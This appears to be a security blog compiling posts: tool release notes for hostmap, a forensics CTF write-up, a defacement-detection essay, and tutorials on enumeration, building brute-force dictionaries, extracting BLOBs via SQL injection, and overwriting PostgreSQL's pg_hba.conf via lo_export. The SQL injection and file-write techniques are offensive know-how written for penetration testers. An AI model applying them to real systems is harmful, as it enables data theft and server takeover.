Get a look at these images with a viewer, one image seems to contains a kind of encoded (like base64) data but i haven’t found an use of that, another image contains some exif data, you can see that with exiftool or a viewer with metadata support.

File size : 4378 bytes
File date : 2010:05:22 01:57:57
Resolution : 116 x 102
GPS Latitude : N 36d 8m 8.5s
GPS Longitude: E 115d 9m 29s
Comment : Who is the author?ASCII

Now it’s time to get a look at the file system. Add every partition to autopsy and search for interesting things.

In partition two we found a suspect file in C:\key but it was deleted.

Anyway it’s a NTFS partition so we can check $MFT for chunks of deleted files. Examining that and searching for the key file we see an interesting string encoded in Unicode (points are null byte)

n.o.t.d.e.l.e.t.e.d.,.n.e.v.e.r.existed

The key was “notdeleted,neverexisted”.

I am glad to release hostmap version 0.2.2.
In this version there are a lot of bug fixes and some new features.

Introduction

hostmap is a free, automatic, hostnames and virtual hosts discovery tool written in Ruby and licensed under GNU General Public License version 3 (GPLv3). It’s goal is to enumerate all hostnames and configured virtual hosts on an IP address. The primary users of hostmap are professionals performing vulnerability assessments and penetration tests.

Changes

Some of the new features include:

* Fixed hostname dictionary “big” list name.
* Fixed DNS AXFR zone transfer check that was prone to false positives under some circumstances.
* Added automatic check for new updates. You can disable it in configuration file or using the option –without-update.
* Fixed DNS History plugin that can raise SystemExit under some strange circumstances.
* Changed the job scheduler. Now is more fast, robust and fine tuned.
* Added a dynamic thread pool, now you can use –threads to choose the number of concurrent threads.
* Some minor fixes.

See the complete list of changes at
http://hostmap.lonerunners.net/doc/Changelog.txt.

Download

You can download it in the following formats:

* Source gzip compressed,
http://update.lonerunners.net/software/download/847af4f866eed21b1a1398e085eb2c2a

* Source zip compressed,
http://update.lonerunners.net/software/download/13c1e21e83f3dc399c3983893efc04f0

Documentation

* hostmap user’s manual: http://hostmap.lonerunners.net/doc/README.pdf

With the Ush.it team we published an advisory about “Nginx, Varnish, Cherokee, thttpd, mini-httpd, WEBrick, Orion, AOLserver, Yaws and Boa log escape sequence injection”. Have a nice read here!

I am glad to release hostmap version 0.2.1.
In this version there are a lot of bug fixes and some new features.

Introduction

hostmap is a free, automatic, hostnames and virtual hosts discovery tool written in Ruby and licensed under GNU General Public License version 3 (GPLv3). It’s goal is to enumerate all hostnames and configured virtual hosts on an IP address. The primary users of hostmap are professionals performing vulnerability assessments and penetration tests.

Changes

Some of the new features include:

* Fixed handling of Errno::ECONNRESET in SSL certificate plugin.
* Upgraded net-dns to latest version from git repository.
* Fixed traceback on Mac OSX due to net-dns bug.
* Added check to enumerate host names with DNS TLD expansion.
* Added –print-maltego to get output in Maltego XML format.
* Fixed the exception handling architecture, now unknown exceptions that can be raised on not supported system are handled.
* Fixed traceback on FreeBSD due to raising of different exceptions.
* Added Metasploit auxiliary module in extra folder.
* Added validation of -t option, if it isn’t an IP address hostmap is stopped.
* Added enumeration plugin timeout, by default at 10 minutes. Can be changed with user supplied –timeout option.
* Moved website from http://hostmap.sourceforge.net to http://hostmap.lonerunners.net
* Added warning message to fix traceback if missing libopenssl-ruby.

See the complete list of changes at
http://hostmap.lonerunners.net/doc/Changelog.txt.

Download

You can download it in the following formats:

* Source gzip compressed,
https://sourceforge.net/projects/hostmap/files/hostmap/hostmap-0.2.1/hostmap-0.2.1.tar.gz/download

* Source zip compressed,
https://sourceforge.net/projects/hostmap/files/hostmap/hostmap-0.2.1/hostmap-0.2.1.zip/download

Documentation

* hostmap user’s manual: http://hostmap.lonerunners.net/doc/README.pdf

I am glad to release hostmap version 0.2.

Introduction

hostmap is a free, automatic, hostnames and virtual hosts discovery tool written in Ruby and licensed under GNU General Public License version 3 (GPLv3). It’s goal is to enumerate all hostnames and configured virtual hosts on an IP address. The primary users of hostmap are professionals performing vulnerability assessments and penetration tests.

Changes

Some of the new features include:

* Fully refactored and rewritten in Ruby.
* User requested interrupt (CTRL+C) now is handled.
* Added Rakefile to automatize task. For example readme and API documentation rebuilding.
* Changed info gathering plugin architecture. Now using PlugMan library.
* Added some host names to brute forcing dictionaries.
* Added parsing of alternate subject (subjectAltName) from X.509 certificates.
* Added info gathering plugin using dnshistory.org.
* Added wildcard domains detection.
* Added wildcard X.509 certificate detection.
* Added -d option to use a user supplied list of DNS servers
* Added blacklist for second level TLD (for example co.uk) detection.
* Added an enumeration plugin to use Microsoft Bing via API. API key must be provided in configuration file.
* Added a configuration file (hostmap.conf) to keep user settings.
* Added option –http-ports to specify the ports to check for an HTTP/HTTPS service.

See the complete list of changes at http://hostmap.sourceforge.net/doc/Changelog.txt.

Download

You can download it in the following formats:

* Source gzip compressed,
https://sourceforge.net/projects/hostmap/files/hostmap/hostmap-0.2/hostmap-0.2.tar.gz/download

* Source zip compressed,
https://sourceforge.net/projects/hostmap/files/hostmap/hostmap-0.2/hostmap-0.2.zip/download

Documentation

hostmap user’s manual: http://hostmap.sourceforge.net/doc/README.pdf

photo credit: anarchosyn

Table of Contents

1. Website defacement
2. Anomaly detection systems
2.1 Checksum comparison
2.2 Diff comparison
2.3 DOM tree analysis
2.4 Complex algorithms
3. Signature detection
4. Thresholds and worst cases

1. Website defacement

A website defacement is the unauthorized substitution of a web page or a part of it by a system cracker. A defacement is generally meant as a kind of electronic graffiti, although recently it has become a means to spread messages by politically motivated cyber protesters or hacktivists.
This is a very common form of attack that seriously damages the trust and the reputation of a website.
Detecting web page defacements is one of the main services for the security monitoring system.
A lot of time ago I wrote a small & smart application to detect web site defacements in large scale with the ability to monitor a lot (thousands) of websites. This was a test to collect some statistics, so I tried to do it in a short time: I wrote it in a few days.
So I was asking me about what techniques and technologies I can use to get the highest detection rate with the minimum effort.
I choose Ruby, Ruby on Rails for the user interface and Event Machine to speed up the performances.
With only few days of development I can’t struggle with complex algorithms to detect defacements, but I choose some very simple techniques, that after some months of tests, seemed to be very effective. The performance and detection rate of this “poor man” techniques are comparable to some others commercial monitoring systems.
The key feature of the proposed techniques is that it does not require the installation of a component (like an HIDS) or a participation of the site maintainers. It require only the URL of the web site to monitor.
Today I want to share this brainstorming about web site detection techniques.

2. Anomaly detection systems

Anomaly detection refers to detecting patterns in a given data set that do not conform to an established normal behavior. The patterns thus detected are called anomalies and often translate to critical and actionable information in several application domains.
The defacement monitoring application needs to detect a change in a web page and detect if it’s “normal” or it’s an “anomaly”.
To create a set of “normal” a preliminary learning phase builds a profile of the monitored web page, then the web site can be monitored for “anomaly” changes.
The detection of a defacement is based on a dynamic threshold, if the web page changed over this threshold the system treat it as defaced and throw a defacement alert.
This threshold is updated to avoid the obsolescence of his value and the learning set.

2.1 Checksum comparison

The simplest way to detect a change in some text-formatted data, like a HTML page, is to compute and check his checksum with a hash algorithm like MD5 or SHA1.
Only a little change in the monitored web page generate a different checksum, so you can detect a defacement.
This works well for “best of ’90s” web sites which uses only static content, but for today’s web pages with contents that change at every reload this technique is quite obsolete.
For example a web page with a counter or a timers inside changes his content at every reload and the checksum is continually different.
Moreover this type of check cannot observe a threshold based system because it’s a comparison with a true or false result.

2.2 Diff comparison

There are some libraries in python and ruby implementing the widely known unix tool diff, using it we can get the difference between two web pages.
We can use a threshold based system learning the usual difference percentage of a web page and check if a changeset is under the usual threshold.
This is a very fast but very effective technique which works well in most dynamic sites.

2.3 DOM tree analysis

This is a similar strategy to the diff comparison, but is used the DOM tree instead of the plain HTML content for the comparison.
The layout of a website changes, tags and properties, have little changes during time. Using this fact you can build up a threshold based system as above.

2.4 Complex algorithms

You can design a lot of algorithms, or use some of the already known, but this is a very expensive work. I haven’t used any complex logic or algorithm but if you want to follow this way you can find a lot of academic papers about this field.

3. Signature detection

The web pages are examined for pre-configured and predetermined attack patterns known as signatures. Many attacks today have distinct signatures. The collection of these signatures must be constantly updated to mitigate emerging threats. I used the wide database of Zone-h to build a signature set always updated.

4. Thresholds and worst cases

The bigger effort is design the engagement rules and tuning good thresholds.
The percentage of changes in a website can change during time, an evaluation of both anomaly detection and signature detection techniques, using a weighted logic can help to reduce false positives.
You must remember that you need to deal with website restyling, layout changes, widgets and banners that can be removed or added.
As today there are some worst cases that causes false negatives: defacement done via javascript (levaraging on a XSS vulnerability) or via CSS, or partial defacements (do you remember the securityfocus.com defacement?) where only a part, like an image or a banner, of the website changes.

The Ush.it team published the second part of “PHP Filesystem Attack Vectors” paper. Have a nice read here!

You can follow SecDocs updates on Twitter now! With few lines of ruby code and twitter4r gem now each new document added to SecDocs is posted as twitter status update.
So if you prefer twitter to RSS feed subscribe to @secdocs updates.

I am happy to announce hostmap:

hostmap is a free, automatic, hostnames and virtual hosts discovery tool written in Python by Alessandro `jekil` Tanasi and licensed under GNU General Public License version 3 (GPLv3). It’s goal is to enumerate all hostnames and configured virtual hosts on an IP address. The primary users of hostmap are professionals performing vulnerability assessments and penetration tests.

Take a look at http://hostmap.sourceforge.net/

photo credit: spdorsey

Table of contents

1. Introduction
2. How BLOB storage works
3. Casting binary data
3.1 MySQL
3.2 PostgreSQL
3.3 SQL Server
4. References

1. Introduction

Exploiting a SQL injection flaw in a web application can give the attacker full control of the remote DBMS. One of the major consequences of exploiting consists in fetching all or part of the data stored in the database.

In several cases, like a web application that stores images on the database, the attacker has to deal with binary data.

Follows some techniques to fetch binary data via a SQL injection flaw.

2. How BLOB storage works

According to Wikipedia a BLOB[1] is:

A binary large object, also known as a blob, is a collection of binary data stored as a single entity in a database management system. Blobs are typically images, audio or other multimedia objects, though sometimes binary executable code is stored as a blob. Database support for blobs is not universal.

Blobs were originally just amorphous chunks of data invented by Jim Starkey at DEC, who describes them as “the thing that ate Cincinnati, Cleveland, or whatever”. Later, Terry McKiever, a marketing person for Apollo felt that it needed to be an acronym and invented the backronym Basic Large Object. Then Informix invented an alternative backronym, Binary Large Object. Today many people believe that blob was originally intended as an acronym for something.

The BLOB data can be stored in the DBMS tables or as usual file system files linked by a pointer in the data table.  The BLOB storage engine  is built with one or a combination of these techniques to get the best performances.

The BLOB storage is handled by the DBMS engine that provides high level SQL statement to the user.

3. Casting Binary data

The idea behind the hack is to cast the BLOB data to another data-type that can be fetched via SQLi. For example: cast a BLOB to a string containing the BLOB encoded in base64, so we can use a string representation of binary object that acts as middleware to fetch data over any type of SQL injection.

As far as I know there are no public automatic SQL injection tools that can fetch binary data from a vulnerable web application.

3.1 MySQL

In MySQL SQL syntax the function HEX()[2] can be used to get the hexadecimal value of one field of any data-type. The function HEX(`foo`) returns a string representation of the hexadecimal value of foo, where foo is a binary large object (BLOB). So we can cast a binary data-type to a string data-type.

For example the following SQL statement returns the hexadecimal value of the binary object stored in the field named blob:

SELECT HEX(`blob`) FROM footable;

Now we can use the hexadecimal BLOB representation to fetch data from binary (BLOB) fields using the standard techniques to fetch data via SQL injection or blind SQL injection.

Using HEX() we can deal a BLOB as a text string and use the common techniques and tools.

Once we have fetched the binary data encoded as hexadecimal, we have to restore the original binary data out of it. We can use the SQL UNHEX() function, that get a hexadecimal string and outputs a BLOB object, a command line utility or a few lines in you favorite programming language can do the trick.

This is the easy way to get a textual representation of BLOB under MySQL, the HEX() function is supported from MySQL 4.1.

4.2 PostgreSQL

PostgreSQL can not store values of more than several thousands bytes within any data-type except large objects, nor can binary data be easily entered within single quotes. Instead, large objects (BLOB) are used to store very large values and binary data.

BLOB permits storage of any operating system file, including images or large text files, directly into the database.

As you can see in the DBMS data-type comparison sheet[3] PostgreSQL stores BLOB data in a data-type called OID that acts like a pointer to the stored object on the file system.

For example using the psql client from command line you can load the file into the database using lo_import(), and retrieve it from the database using lo_export() which works only for local files[4].

postgres=# CREATE TABLE foo (image OID);
CREATE TABLE
postgres=# INSERT INTO foo VALUES (lo_import(‘/tmp/bar.jpg’));
INSERT 0 1

The lo_import() function stores /tmp/bar.jpg into the database. The function call returns an OID that is used to refer the imported large object. This value is stored in foo.image as an integer.

If you want to read the foo.image value the lo_export() function uses the OID value to find the large object stored in the database, then places the exported file into the output file.

Full path names must be used with large objects because the database server runs in a different directory than the psql client. Files are imported and exported by the postgres user, so postgres must have permission to read the file for lo_import() and directory write permission for lo_export().

There are others functions to manage large objects (BLOB) available under PostreSQL[5].

Because large objects uses the local filesystem, users connecting over a network can not use lo_import() or lo_export(). They can, however, use psql’s \lo_import and \lo_export commands.

If we are exploiting a SQL injection in a web application we can’t use the functions lo_import() and lo_export() but we need a way to get the juice data on the vulnerable server.

From PostgreSQL documentation “String Functions and Operators”[6] we catch the function ENCODE(data bytea, type text).

This function encodes binary data to an ASCII-only representation. The supported types are: base64, hex, escape.

Now we have the function to convert a bytea data-type into a base64 or hex string. We need only to convert the BLOB OID in a bytea.

The fastest way to do this is a two step recipe: first get the number of OID that you need and after quering the system table pg_largeobject.

postgres=# SELECT image FROM foo;
image
——-
16387
(1 row)
postgres=# SELECT ENCODE(data, ‘base64′) FROM pg_largeobject WHERE LOID=16387;
encode
——————————————————————————
JVBERi0xLjINJeLjz9MNCjIwOSAwIG9iag08PCANL0xpbmVhcml6ZWQgMSAN
IDYyOCA4NTEgXSANL0wgMjU4NDYxOCANL0UgMTI5NDg1IA0vTiAxNiANL
DWVuZG9iag0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC
[snip..]
M2I4MWJkNTdlOTNjNWVmNj5dDT4+DXN0YXJ0eHJlZg0xNzMNJSVFT0YN
(1263 rows)

Now you get your goal and you can fetch a BLOB on PostgreSQL with only two queries.

For further details on PostgreSQL BLOB functions you can refer to “SQLi: Writing files to disk under PostgreSQL”[7].

3.3 SQL Server

SQL Server stores binary data in the following data-types: BINARY, VARBINARY, IMAGE.

You can create a demo table for your test with:

CREATE TABLE dbo.foo
(
image image NULL
)  ON [PRIMARY]
TEXTIMAGE_ON [PRIMARY]
GO

You can insert the file foo.bmp with the following:

INSERT INTO [tempdb].[dbo].[foo]
([image])
SELECT * FROM
OPENROWSET(BULK N’C:\foo.bmp’, SINGLE_BLOB) AS i
GO

The binary data can be converted to a hex string injecting a stored procedure in SQL Server. This is described in Microsoft kb104829[8].

create procedure sp_hexadecimal
@binvalue varbinary(255)
as
declare @charvalue varchar(255)
declare @i int
declare @length int
declare @hexstring char(16)

select @charvalue = ’0x’
select @i = 1
select @length = datalength(@binvalue)
select @hexstring = “0123456789abcdef”

while (@i <= @length)
begin

declare @tempint int
declare @firstint int
declare @secondint int

select @tempint = convert(int, substring(@binvalue,@i,1))
select @firstint = floor(@tempint/16)
select @secondint = @tempint – (@firstint*16)

select @charvalue = @charvalue +
substring(@hexstring, @firstint+1, 1) +
substring(@hexstring, @secondint+1, 1)

select @i = @i + 1

end

select ‘sp_hexadecimal’=@charvalue

3.4 Other DBMS

The same technique can be used in any other DBMS like Oracle, DB2, Informix that have casting functions or BLOB conversion functions.

4. References

[1] http://en.wikipedia.org/wiki/Binary_large_object
[2] http://dev.mysql.com/doc/mysql/en/String_functions.html
[3] http://www.lonerunners.net/1246-database-datatype-comparison-sheet.html
[4] http://www.postgresql.org/files/documentation/books/aw_pgsql/node96.html
[5] http://www.postgresql.org/docs/8.3/interactive/largeobjects.html
[6] http://www.postgresql.org/docs/8.1/interactive/functions-string.html
[7] http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql
[8] http://support.microsoft.com/kb/104829

photo credit: Hey Paul

Table of Contents

1. Why you need to enumerate
2. Techniques
2.1 DNS enumeration techniques
2.2 Banner grabbing
2.3 SSL/TLS Protocol enumeration techniques
2.4 HTTP Protocol enumeration techniques
2.5 Passive web enumeration techniques
2.6 Active web enumeration techniques

1. Why you need to enumerate

The host name discovery phase is an information gathering act to get a complete and detailed view of target resources and attack points.

During an attack or a penetration test, the attacker needs to known  as much information as possible about the entry points to attack. An entry point can be identified with an IP address, a service port, and some application level information, like the virtual host name in the case of a web server hosting several sites.

2. Techniques

There are several techniques that can be used to discover host names and virtual hosts associated with a IP address.

Some techniques described here are implemented (and the others will be implemented soon) in hostmap, a tool that I wrote to discover virtual hosts and DNS names of a given IP address. As of today, the tool is private (it does not depend on me) but I hope to release it to the public domain soon.

2.1 DNS enumeration techniques

The following enumeration techniques are based on the DNS protocol and are:

• Reverse DNS lookup: Performs a PTR request to get the host name from IP address.

• Name servers record lookup: Get the authoritative name server for the target host.

• Mail exchange record lookup: Get the MX records for the target host domain.

• DNS AXFR zone transfer: The name server that serve the target machine’s domain zone can be prone to a zone transfer attack. This allows an attacker to perform an AXFR DNS request to retrieve all of the DNS records served.

• Host name brute forcing: Using a brute-forcing technique to guess a host name on the enumerated domain that resolve as the target ip address.

2.2 Banner grabbing

The services exposed by the target host can disclose a host name in the response banner. You need to simply telnet in all open ports and wait for a response banner (or negotiate the application protocol). For example this is the response banner of a SMTP server running Postfix:

$ telnet 10.0.0.1 25
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
220 mail.example.lan ESMTP Postfix

As you can see in the response banner you get the host name.

2.3 SSL/TLS Protocol enumeration techniques

The following enumeration techniques are based on the SSL/TLS protocol and is:

• X.509 Certificate: Often the target machine exposes an HTTP over SSL service. A connection is tried to the common HTTP service ports and is tried to negotiate an SSL/TLS connection, if the remote server supply a X.509 certificate the host name is taken from the Common Name (CN) field.

2.4 HTTP Protocol enumeration techniques

• Virtual host brute-forcing: The web server can be brute-forced to guess a website served by the target host.
• Following redirects: It is possible to guess another website served by the target host following redirects (HTTP code 301 and 302).
• With error pages: If you try to get an error page (code 500) sometimes you can get an error page showing a banner with the host name.

2.5 Passive web enumeration techniques

The following enumeration techniques are based on third party web sites and are:

• Search engines: The following search engines can be used and queried using the target IP address:

– Microsoft Live (with the dork “ip:”): [http://search.msn.com]

• GPG/PGP key databases: The following public databases can be used:

– MIT gpg key server: [http://pgp.mit.edu:11371]

• DNS/WHOIS databases: Public whois information databases like RIPE, or DNS snapshot database can be used to passively enumerate host name and track his history.

The following is a partial list of public databases that can be used:

– Domainsdb: [http://www.domainsdb.net/]

– Fbk.de: [http://www.bfk.de/]

– Gigablast: [http://www.gigablast.com]

– Netcraft: [http://searchdns.netcraft.com]

– Robtex: [http://www.robtex.com]

– Tomdns: [http://www.tomdns.net]

– Web hosting: [http://whois.webhosting.info/]

– Web-max: [http://www.web-max.ca]

2.6 Active web enumeration techniques

• Crawling: All published websites can be crawled for links to other sites and checked (if they resolve as the target IP address) to get other sites hosted on the target. This technique is very time consuming.

UPDATE: hostmap is a free, automatic, hostnames and virtual hosts discovery tool written in Python. hostmap has been released in may and you can get it at http://hostmap.sourceforge.net/

The success and the time elapsed in a brute forcing attack depends by the number of discovered brute forcing points, the quality of the tool used (like THC-hydra, brutus or medusa) and the quality of the dictionary used.

Sometimes using a incremental dictionary is a waste of time, a good dictionary can be the success key to a fast brute forcing attack. Get a dictionary of common words and keep it updated is an hard work.

Wikipedia is a free multilingual encyclopedia, it currently contains 2,683,099 articles. This is a really good database to generate a dictionary of common words.

Wikipedia offers free copies of all available content to interested users. These databases can be used for mirroring, personal use, informal backups, or database queries. All text content is licensed under the GNU Free Documentation License (GFDL). Images and other files are available under different terms, as detailed on their description pages.

The Wikipedia database download page is available here: http://en.wikipedia.org/wiki/Wikipedia_database and the database dumps atre available here: http://download.wikimedia.org/backup-index.html

A good dictionary must contains the most common terms used in a current language and also common words that can be used as password, an example is “foo”, “bar”, “1234″, “antani”, etc.

We can create two types of dictionary, a dictionary contining all the words inside wikipedia, a dictionary containing all article titles, a dictionary containing all the words in the article titles.

After downloading a bunch of gigs we get the wikipedia database dump in XML, the fields that we need to create our dictionay are <title> and <text>.

Now you can create all the types of dictionary that you need: words, titles, case sensitive or case insensitive.

To achieve better performances I used simple bash scripting for parsing because using a DOM or SAX parser is too slow with these very big XMLs.

This dictionary contains all the article titles, so you can guess password like names, cities, etc.

To create it you can use the following or you can edit it to fit your needs, it’s not beautiful but works:

grep -E ‘<title>(.*?)</title>’ itwiki-20081206-pages-meta-current.xml | cut -d ‘>’ -f2| cut -d ‘<’ -f1 | grep -v : | sed s/\(.*\)//g| sort | uniq

Word dictionary contains all the words in the wikipedia articles, you can create it with a command similar to the above, I left it for your homework

Happy brute forcing!

photo credit: Paul Worthington

Table of Contents

1. Introduction
2. Default configuration
3. COPY Function
3.1 COPY function abusing
4. BLOB functions
4.1 BLOB functions abusing
5. User defined functions
5.1 User defined functions abusing
6. Conclusions
7. References

1. Introduction

The following examples assume access to the database has been achieved through SQL Injection vulnerability in a web application.

Sometimes, against best practice, the application has connected to the database using superuser credentials.

2. Default configuration

In some systems the configuration files of PostgreSQL are owned by the user used to run the PostgreSQL process.

For example in my Ubuntu laptop the PostgreSQL configuration file are owned by postgres by default, as you can see:

$ ls -al /etc/postgresql/8.3/main/
total 44
drwxr-xr-x 2 root     root      4096 2008-05-14 00:20 .
drwxr-xr-x 3 root     root      4096 2008-04-12 15:19 ..
-rw-r--r-- 1 root     root       316 2008-04-12 15:20 environment
-rw-r----- 1 postgres postgres  3845 2008-05-13 23:07 pg_hba.conf
-rw-r----- 1 postgres postgres  1460 2008-04-12 15:20 pg_ident.conf
-rw-r--r-- 1 postgres postgres 16682 2008-04-12 15:20 postgresql.conf
-rw-r--r-- 1 root     root       378 2008-04-12 15:20 start.conf

All the configuration files are owned by postgres user which can write these.

So anyone that can execute a SQL statement that write files to disk can try to overwrite a configuration file and do all evil things.

3. COPY Function

The COPY statement transfers data between PostgreSQL tables and standard file system files.

COPY TO statement copies the contents of a table to a file, while COPY FROM copies data from a file to a table (appending the data to whatever is in the table already).

It can export data as text or PostgreSQL’s own binary format, which contains a header.

Using COPY with a file name instructs the PostgreSQL server to directly read from or write to a file. The file must be accessible to the server and the name must be specified from the viewpoint of the server. When STDIN or STDOUT is specified, data is transmitted via the connection between the client and the server.

In PostgreSQL 8.0 and later the database file locations can be determined querying system table pg_settings:

postgres=# SELECT setting FROM pg_settings WHERE name='data_directory';
setting
------------------------------
/var/lib/postgresql/8.3/main
(1 row)

3.1 COPY function abusing

The files are accessed under the operating system user privilege that the database runs as and it’s available only to database superusers.

The COPY command does not accept relative paths to prevent the overwriting of a database file, more explanation of this can be found in copy.c source file.

So an attacker can use ~ to write in PostgreSQL home directory and must write files in already known path or a well known directory like /tmp.

The caveat is that the file cannot contain a null byte (0×00) otherwise proceeding bytes will not be written out.

4. BLOB functions

PostgreSQL uses large objects, also called Binary Large Objects, to store very large values and binary data. Large objects permit storage of any operating system file, including images or large text files, directly into the database.

It has provided support for BLOB, also called Large Objects, since version 4.2. From version 7.2 organized the three large object interfaces such that all large objects are now placed in the system table pg_largeobject.

According to the Database Data Type Comparison Sheet[3] there are two data types used by PostgreSQL to store BLOB:

• BYTEA: used to store small amount of binary data that are stored in the data table

• OID: used to store very large amount of binary data in form of file in the filesystem

4.1 BLOB functions abusing

The file is loaded into the database using lo_import(), and is retrieved from the database using lo_export(). These functions take a path as argument that is the path of file to load or the path where export the data in the BLOB field.

In detail[2] to export a large object into an operating system file, call the lo_export() function, with argument that specifies the operating system name of the file.

Note that the file is written by the client interface library, not by the server. Returns 1 on success, -1 on failure.

Reading PostgreSQL documentation in the BLOB section[1] there is the following:

Files are imported and exported by the postgres user, so postgres must have
permission to read the file for lo_import() and directory write permission for
lo_export().

So this function can write a file to disk and abusing it we can overwrite the PostgreSQL configuration files.

First of all we need to create a temporary table (if your user have right permissions) to store our evil data:

postgres=# CREATE TABLE foo (
postgres(# bar oid,
postgres(# id int4,
postgres(# CONSTRAINT id PRIMARY KEY (id) ) WITHOUT OIDS;
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "id" for table "foo"
CREATE TABLE

The easiest way to load a file is using lo_import() that imports a file from the local file system but if you want to use this you must have a way to store a file on target system.

postgres=# INSERT INTO foo VALUES (lo_import('/tmp/bar.bin'), 1);
INSERT 0 1

Now you can try to abuse of lo_export() to overwrite a PostgreSQL configuration file.

If the web application connects to PostgreSQL using a user with superuser permission you can overwrite any configuration file owned by postgres, here we overwrite pg_hba.conf:

postgres=# SELECT lo_export(bar, '/etc/postgresql/8.3/main/pg_hba.conf') FROM
postgres+# foo WHERE id=1;
lo_export
-----------
1
(1 row)

If the web application runs as a non-superuser user you can get the following error message:

Query failed: ERROR: must be superuser to use server-side lo_export() HINT:
Anyone can use the client-side lo_export() provided by libpq.

If you are exploiting a SQL injection you can’t use lo_import() because it needs to write files in the local system the pg_largeobject table can be queried and updated directly, it’s “data” column is the equivalent to the BLOB data type found in other DBMS and is of type BYTEA.

Remember that when writing BYTEA data all non printable characters must be represented in octal syntax like 00 and the \ must be escaped if you use it inside a string.

For example 00 becomes 0 inside a string.

A trick is to transfer data encoded in hex or base64 and then decode it in the database, but remember that this cause an overhead, for example of 34% of the file size using base64.

Using direct access to pg_largeobject we can transfer an arbitrary file and then exporting it via lo_export().

First of all you must create a new entry in pg_largeobject.

postgres=# SELECT lo_create(-1);
lo_create
----------
24586
(1 row)

And now load your file encoded in base64 (also hex encoding can be used).

postgres=# UPDATE pg_largeobject SET data = (DECODE('YW50YW5p', 'base64'))
postgres+# WHERE LOID = 24586;
UPDATE 1

Your file is loaded in the target DBMS, now you can write it to disk using lo_export().

postgres=# SELECT lo_export(24586, '/etc/postgresql/8.3/main/pg_hba.conf');
lo_export
-----------
1
(1 row)

5. User defined functions

The PostgreSQL functionalities can be extended user-defined functions, data types, triggers, etc[6] written in C or other languages.

By default only superuser can create new functions using language C.

5.1 User defined functions abusing

Using a user-defined function is possible to define function to open, create and write files.

The code is not too short and described by Nico Leidecker[5] and also is the author of pgshell[7], a tool to automatize the exploitation process.

6. Conclusions

Exploiting a SQL injection to write files in to the attacked system disk can be done in three ways but as you can see in the following comparison table you can do it only if the database user is a superuser.

+-------------------------------+-------------+------+
|                               | Super user  | User |
+-------------------------------+-------------+------+
+-------------------------------+-------------+------+
|    Write files with COPY      |    YES      |  NO  |
+-------------------------------+-------------+------+
| Write files with lo_export()  |    YES      |  NO  |
+-------------------------------+-------------+------+
|   Write file via extension    |    YES      |  NO  |
+-------------------------------+-------------+------+

So in the case we aren’t superuser a privilege escalation vulnerability can be user to upload files.
If you achieve the capability to upload files you can overwrite the PostgreSQL configuration files.

7. References

[1] http://www.postgresql.org/files/documentation/books/aw_pgsql/node96.html
[2] http://www.postgresql.org/docs/8.3/interactive/lo-interfaces.html
[3] http://www.lonerunners.net/1246-database-datatype-comparison-sheet.html
[4] http://www.postgresql.org/docs/8.1/interactive/sql-copy.html
[5] http://labs.portcullis.co.uk/download/Having_Fun_With_PostgreSQL.pdf
[6] http://www.postgresql.org/docs/8.3/interactive/server-programming.html
[7] http://www.leidecker.info/projects/pgshell.shtml

lonerunners.net is a blog composed by all kind of my crap, cinema, personal facts, technology news and IT security posts, some in italian and others in english.

Now all research and information security posts are published here, in english, lab.lonerunners.net wanna be a place for IT security  pills,  hacking drugs, and reserch news.

So subscibe to our RSS feed to keep updated about cutting edge security pills.